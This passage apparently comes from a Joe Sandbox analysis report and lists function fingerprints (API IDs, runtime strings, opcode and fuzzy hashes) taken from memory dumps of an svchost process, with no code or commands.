                                                                                • Instruction ID: 03f29b56315fbdb1e2c5d3331ac812390df4fb0cbb8384e9f5da931591f2930e
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9D31A232292E82E1EE219B62A4007F523D4B748BE0F5E6675DD2E0B7D0EF39C5858310
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: afc53225cc655b2fed49d42925427f3b528b099016d9c220d28cc2c64652b1ec
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 1D51AB32661A02CAFB18DB15E484BB93BE5F354BDCF518134DB1643B88EB78E841CB84
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 5bb8fd39fd54a1bbbe4b45dd7fca3805f069a24c38516c4c1dc5b630a5076e57
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: C431BC72251B42D6F714DF12E884BA97BE8F740BC8F458124EF9A43B88DB38E941C784
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: c39e5784b660c4a4d2f64d18794380c2bf08d3c743fbeb2aeb89f9dd3d7ee852
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: E0D19A72B54E818AE711CBA9D4402FC7BF1F358BD8F1482A6DE5997B99DB34C506C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 6a44d1e2dfff894d57fae1d393df2fad9fd7c7e601c52ccba1ddab5a2a16cdc8
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 90014476640ED1DAE704EF66E9082AAA7E0F78CFC1F088435EA4A43729EF38C151C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: fc060a2a777751a54c3aac3ae4014f4932e9590c1f0470bfe82fe847ff4173f9
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: DD91CE72B50ED289FB64DF6594903FD3BE0B745BC8F1481A9DE0AA7A95DB34C482C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: 96732df7916216e4dd4de8696d19f0f646e57f72df42aa736ed25244752b7042
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: B0111872790F428AEB008B70E8543B833A4F719798F441E35DA6D477A4EB78D2988380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: a81e46be2f1358104ca60f674bf27db7b8eb3ba3bc6c3102e371a9ccd66cc1d5
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 1B719F36280FC286EB259F36A8483FA67D4F389BC4F582076DD0A53B9ADF35D6458700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: ae7e25292b4b5205da875e4987803c657081cd892f163ddae90b46efd944a166
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 7E613432A01B868AEB20DF69D4803ED7BA0F748BD8F144225EF4917B99DB78E595C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 2488fe1737ff95e66ad044885111441f0c3a749c14707708a82aa8e704c637ae
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: B551C072284FC381EB649A3AA4583FAA7D1F3857C0F4D61B5DE5903B9ADB39C6058740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 2514762f6e10ab6845feae25dddec55dde5b08df4a5e13f98591cf2ab0d60153
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 60418D72615E8186EB209F25E8443FAB7A0F798BD4F548171EE4E87798EB3CC541CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: a1389ac8532826ac596aaee6b13d59646ba39f355e91e1ec56b6d169f0d5a3fa
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 61112832214FC182EB618F25E4443A9B7E5FB88B94F598264EE8C07B69DF3CC595CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 09633eca710365df152610dc5942b59f08b7406966c11a0154c1b9ae03bc6ca5
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 09E086B1680F4690DF028F62E8802E837E0DB58BA4B489132DA5C47351FB7CD1E9C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3366878144.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c1d0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 6f46bb36e99698124d87c0e4d324587b24abbfd4879edec8008199ce5951e68a
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 74E0E6B1651F45D4DF028F61E4901E877A5E758B94B889132DA5C47355EB78D1E5C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000002F.00000002.3371122351.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_47_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 4d82505500ce06d62ce877f2f89efa63fb9e64a04db03c9d2b6106834071bf2b
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 67113A35641F8686EA54DB66A8082B967E1FB89FC0F1890B9DE4D57776EF38C442C300